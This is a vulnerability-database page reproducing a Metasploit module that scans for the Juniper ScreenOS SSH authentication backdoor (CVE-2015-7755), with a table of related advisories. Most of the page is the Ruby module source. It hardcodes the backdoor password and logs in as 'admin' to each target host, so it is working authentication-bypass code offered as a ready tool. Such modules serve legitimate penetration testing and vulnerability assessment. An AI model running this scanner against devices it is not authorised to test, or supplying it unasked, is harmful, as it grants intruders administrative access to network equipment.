Vulners
Lucene search
Juniper SSH Backdoor Scanner
🗓️ 01 Sep 2024 00:00:00Reported by H D Moore, h00die, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 252 Views
| Reporter | Title | Published | Views | Family All 29 |
|---|---|---|---|---|
 | Exploit for Improper Authentication in Juniper Screenos | 9 Jan 201622:49 | – | githubexploit |
 | CVE-2015-7755 | 19 Dec 201500:00 | – | attackerkb |
 | CVE-2015-7755 | 21 Dec 201511:58 | – | circl |
 | Juniper ScreenOS Improper Authentication Vulnerability | 2 Oct 202500:00 | – | cisa_kev |
 | CISA Adds Five Known Exploited Vulnerabilities to Catalog | 2 Oct 202512:00 | – | cisa |
 | Backdoor Vulnerability in Juniper Networks ScreenOS (CNVD-2015-08307) | 21 Dec 201500:00 | – | cnvd |
 | Juniper Networks ScreenOS Authentication Bypass (CVE-2015-7755) | 21 Dec 201500:00 | – | checkpoint_advisories |
 | CVE-2015-7755 | 19 Dec 201511:00 | – | cve |
 | CVE-2015-7755 | 19 Dec 201511:00 | – | cvelist |
 | EUVD-2015-7656 | 7 Oct 202500:30 | – | euvd |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'net/ssh'
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::SSH
def initialize(info = {})
super(update_info(info,
'Name' => 'Juniper SSH Backdoor Scanner',
'Description' => %q{
This module scans for the Juniper SSH backdoor (also valid on Telnet).
Any username is required, and the password is <<< %s(un='%s') = %u.
},
'Author' => [
'hdm', # Discovery
'h00die <mike[at]stcyrsecurity.com>' # Module
],
'References' => [
['CVE', '2015-7755'],
['URL', 'https://www.rapid7.com/blog/post/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor/'],
['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713']
],
'DisclosureDate' => '2015-12-20',
'License' => MSF_LICENSE
))
register_options([
Opt::RPORT(22)
])
register_advanced_options([
OptBool.new('SSH_DEBUG', [false, 'SSH debugging', false]),
OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10])
])
end
def run_host(ip)
ssh_opts = ssh_client_defaults.merge({
:port => rport,
:auth_methods => ['password', 'keyboard-interactive'],
:password => %q{<<< %s(un='%s') = %u},
})
ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']
begin
ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do
Net::SSH.start(
ip,
'admin',
ssh_opts
)
end
rescue Net::SSH::Exception => e
vprint_error("#{ip}:#{rport} - #{e.class}: #{e.message}")
return
end
if ssh
print_good("#{ip}:#{rport} - Logged in with backdoor account admin:<<< %s(un='%s') = %u")
report_vuln(
:host => ip,
:name => self.name,
:refs => self.references,
:info => ssh.transport.server_version.version
)
end
end
def rport
datastore['RPORT']
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Sep 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 210
EPSS0.85797